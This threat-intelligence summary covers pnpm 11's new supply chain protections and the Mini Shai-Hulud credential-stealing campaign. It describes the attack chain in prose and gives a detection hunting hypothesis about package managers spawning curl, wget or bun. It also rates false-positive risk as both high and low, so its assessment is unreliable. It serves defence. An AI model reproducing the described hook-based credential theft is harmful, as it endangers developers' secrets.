Skip to content
.ca
sign in
4 mininfo

pnpm 11 Adds Supply Chain Protection Defaults for Minimum Release Age and Exotic Subdependencies

The release of pnpm 11 introduces significant supply chain security enhancements, including a default 24-hour minimum release age for packages, the blocking of exotic subdependencies, and a streamlined allowBuilds model. These features are designed to mitigate rapid supply chain attacks, such as the recent Mini Shai-Hulud campaign, by restricting install-time execution and unexpected dependency sources.

Conf:highAnalyzed:2026-05-07Google

Authors: Sarah Gooding

ActorsMini Shai-Hulud
Package Managerpnpmmini Shai-HuludSupply Chain Security

Source:Socket

Detection / HunterGoogle

What Happened

The popular package manager pnpm has released version 11, which includes new built-in security features to protect developers from malicious software. It now forces a 24-hour waiting period before downloading newly published packages, preventing attackers from quickly spreading bad code. It also blocks hidden or unusual software dependencies by default and gives teams better control over which packages can run scripts during installation. These changes help defend against recent attacks that try to steal passwords and secrets from developers and automated building systems. Developers using pnpm should upgrade to take advantage of these new protections.

Key Takeaways

  • pnpm 11 introduces a default Minimum Release Age of 24 hours to mitigate the risk of fast-moving malicious package campaigns.
  • Exotic subdependencies (e.g., direct tarball URLs, Git repositories) are now blocked by default to prevent hidden malicious code from entering the dependency tree.
  • A new 'allowBuilds' model simplifies the governance of which packages are permitted to execute build scripts during installation.
  • The release is a direct response to modern supply chain threats like the 'Mini Shai-Hulud' campaign, which targeted developer and CI/CD secrets via preinstall hooks.
  • pnpm 11 also includes built-in SBOM generation, isolated global installs, and drops support for Node.js versions prior to 22.

Affected Systems

  • Node.js environments using pnpm
  • CI/CD pipelines
  • Developer workstations

Attack Chain

In supply chain campaigns like Mini Shai-Hulud, attackers compromise publisher accounts or tokens to push malicious package versions to registries like npm, PyPI, or Packagist. They rely on automated installs or fresh CI environments to pull the package quickly before detection. The malicious packages use preinstall or import-time hooks to download external payloads, such as a platform-specific Bun runtime, which then executes an obfuscated credential stealer targeting developer and CI/CD secrets.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

No specific detection rules are provided in the article, as it focuses on preventative security features introduced in a software update.

Detection Engineering Assessment

EDR Visibility: Medium — EDR can monitor process creation from package managers (e.g., node.js spawning shell scripts or curl/wget during preinstall hooks), but may lack context on the specific package being installed. Network Visibility: Medium — Network monitoring can detect unexpected downloads (e.g., downloading a Bun runtime from an unknown IP during an npm install), but registry traffic itself is typically encrypted. Detection Difficulty: Moderate — Distinguishing legitimate build scripts from malicious preinstall hooks requires baseline knowledge of normal developer activity and package behavior.

Required Log Sources

  • Process Creation Logs
  • Command Line Logging
  • Network Traffic Logs

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Look for package manager processes (npm, pnpm, yarn) spawning unexpected child processes like curl, wget, or unknown runtimes (e.g., bun) to download external payloads.Process Creation (Event ID 4688 or Sysmon Event ID 1)ExecutionHigh (Many legitimate packages download binaries during postinstall/preinstall scripts).

Control Gaps

  • Lack of strict egress filtering on CI/CD build nodes
  • Implicit trust in newly published packages without a quarantine period

Key Behavioral Indicators

  • Package managers executing obfuscated shell commands
  • Unexpected network connections to non-registry domains during package installation

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Upgrade to pnpm 11 to leverage the new default supply chain protections.
  • Review and configure the 'allowBuilds' setting to explicitly permit only trusted packages to execute build scripts.

Infrastructure Hardening

  • Implement egress filtering on CI/CD runners to block unexpected outbound connections during package installation.
  • Enforce a minimum release age or quarantine period for all third-party dependencies across all package managers.

User Protection

  • Educate developers on the risks of exotic subdependencies and preinstall scripts.
  • Ensure developer workstations have EDR coverage to detect credential theft attempts.

Security Awareness

  • Promote awareness of supply chain attacks like Mini Shai-Hulud and the importance of dependency review.

MITRE ATT&CK Mapping

  • T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1552.004 - Unsecured Credentials: Private Keys

Related